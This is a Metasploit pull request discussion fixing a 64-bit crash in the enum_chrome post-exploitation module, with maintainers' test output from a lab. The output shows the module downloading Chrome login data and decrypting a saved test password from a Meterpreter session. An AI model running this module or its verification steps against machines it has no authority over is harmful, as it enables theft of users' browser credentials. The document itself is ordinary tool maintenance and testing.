Fix #18544: Support x64 in enum_chrome

[zeroSteiner]

The enum_chrome module's #decrypt_data method was crashing on 64-bit sessions due to an incorrect railgun definition for the LocalAlloc function. LocalAlloc was defined as having a return value of DWORD when it should infact be HANDLE. When it was defined as DWORD, the 64-bit value would be truncated to 32-bits causing the write operation to trigger a memory access violation which inturn cause the session to crash.

Fixed the issue by correcting the definition of LocalAlloc.

#decrypt_data Refactoring

I also made the following changes to #decrypt_data since I was looking at it so closely:

• Removed an unused assignment to memsize
• Check that the initial memory was actually allocated before writing to it
• Don't pass 16 to CryptUnprotectData as the ppszDataDescr parameter because it is not a valid LPWSTR
• Don't leak memory in the event that CryptUnprotectData by ensuring mem and addr are always free'ed
• Combine free calls into one for speed
• Don't assume the sessions is ARCH_X64 if it is not ARCH_X86 because that may change some day

Verification

• Install Chrome on a Windows target
• Add at least one saved password to Chrome (log into a website and allow Chrome to save the password for you)
• Start msfconsole
• Open a 64-bit Meterpreter sessions
• Run the post/windows/gather/enum_chrome mdoule and see that the session does not crash

[adfoster-r7]

Works for me on x86 and x64 👍

Scenario: No decryption required:

[*] Starting interaction with 5...

meterpreter > run post/windows/gather/enum_chrome

[*] Impersonating token: 3344
[*] Running as user 'WINDEV\vagrant'...
[*] Extracting data for user 'vagrant'...
[+] Downloaded Web Data to '/Users/user/.msf4/loot/20231121152225_default_192.168.123.132_chrome.raw.WebD_977664.txt'
[-] Cookies not found
[+] Downloaded History to '/Users/user/.msf4/loot/20231121152225_default_192.168.123.132_chrome.raw.Histo_024651.txt'
[+] Downloaded Login Data to '/Users/user/.msf4/loot/20231121152226_default_192.168.123.132_chrome.raw.Login_320716.txt'
[-] Bookmarks not found
[+] Downloaded Preferences to '/Users/user/.msf4/loot/20231121152226_default_192.168.123.132_chrome.raw.Prefe_439737.txt'
meterpreter

Scenario: With decryption (via 'logging in' to https://www.w3schools.com/howto/howto_css_login_form.asp)

meterpreter > run post/windows/gather/enum_chrome

[*] Impersonating token: 3344
[*] Running as user 'WINDEV\vagrant'...
[*] Extracting data for user 'vagrant'...
[+] Downloaded Web Data to '/Users/user/.msf4/loot/20231121152418_default_192.168.123.132_chrome.raw.WebD_049324.txt'
[-] Cookies not found
[+] Downloaded History to '/Users/user/.msf4/loot/20231121152419_default_192.168.123.132_chrome.raw.Histo_843338.txt'
[+] Downloaded Login Data to '/Users/user/.msf4/loot/20231121152420_default_192.168.123.132_chrome.raw.Login_249387.txt'
[-] Bookmarks not found
[+] Downloaded Preferences to '/Users/user/.msf4/loot/20231121152420_default_192.168.123.132_chrome.raw.Prefe_921904.txt'
[*] Found password encrypted with masterkey
[+] Found masterkey!
[+] Decrypted data: url:https://www.w3schools.com/howto/howto_css_login_form.asp foo:bar
[+] Decrypted data saved in: /Users/user/.msf4/loot/20231121152421_default_192.168.123.132_chrome.decrypted_658428.txt
meterpreter > cat /Users/user/.msf4/loot/20231121152421_default_192.168.123.132_chrome.decrypted_658428.txt
[-] stdapi_fs_stat: Operation failed: The system cannot find the path specified.
meterpreter > lcat /Users/user/.msf4/loot/20231121152421_default_192.168.123.132_chrome.decrypted_658428.txt
Decrypted data
==============

 Name  Decrypted Data  Origin
 ----  --------------  ------
 foo   bar             https://www.w3schools.com/howto/howto_css_login_form.asp

Verified the crash in #18559 too

[adfoster-r7]

Release Notes

Fixes a crash in the post/windows/gather/enum_chrome module which can be used to decrypt passwords stored by the user in Chrome